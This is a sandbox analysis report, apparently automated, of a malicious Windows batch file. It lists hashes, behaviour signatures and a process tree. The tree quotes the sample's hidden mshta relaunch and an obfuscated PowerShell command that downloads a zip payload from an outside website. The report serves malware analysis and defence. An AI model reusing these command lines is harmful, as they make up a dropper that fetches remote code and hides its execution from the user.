Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
  • submitted
    15/10/2024, 23:37

General

  • Target

    1[1].bat

  • Size

    158KB

  • MD5

    fe40ee4255d4757724cfca0bc65c2384

  • SHA1

    d012699b807eb5b32909ffdc365897ecc2b46c15

  • SHA256

    2f4252bb9695dd309f064d40d3fa45a122e6a44b3c442bff8d1ee1cd0a27c0fc

  • SHA512

    b58e09d1052c5d2e636329bb31337b2addd14971fd2322b382489af238dd536118490f1e4cdd461b68d666a7b0837404014970c6b2245a1f805074b203111dc7

  • SSDEEP

    3072:itkxMyL+YnNk57n2+d1zyPpwIjbrnHM7kZQ0u/swy/W:igJKKNk57fdB4pwIjbKkeGW

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\1[1].bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1916
    • C:\Windows\system32\chcp.com
      chcp 65001
      2⤵
        PID:2300
      • C:\Windows\system32\mshta.exe
        mshta vbscript:createobject("wscript.shell").run("""C:\Users\Admin\AppData\Local\Temp\1_1_~1.BAT"" ::",0)(window.close)
        2⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:2380
        • C:\Windows\system32\cmd.exe
          cmd /c ""C:\Users\Admin\AppData\Local\Temp\1_1_~1.BAT" ::"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1644
          • C:\Windows\system32\chcp.com
            chcp 65001
            4⤵
              PID:2724
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://tvdseo.com/wp-content/cache/wp-rocket/synaptics.zip', [System.IO.P~37, 1%w%jF,fXtX%k%Qi[NN,$AICSALx_$$%coMMONPRogRAmw6432:~1, 1%J1%dGtLVU%h%jQqkBx%w%ohVlWGB%W1%WWLhu%h%pRJZg%p%tRQR,Bj%s%dLQP?g%S1%XVlPzC%d%])b#j?%w%ipATPi_%k%GoA$sjtXRUWldbsveEsiUdSjdtF])g$%a%zN[h$P::FWfQj3f9.zip') "
              4⤵
                PID:2760
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2764

Downloads

  • memory/2764-5-0x000000001B680000-0x000000001B962000-memory.dmp

    Filesize

    2.9MB

  • memory/2764-6-0x0000000002240000-0x0000000002248000-memory.dmp

    Filesize

    32KB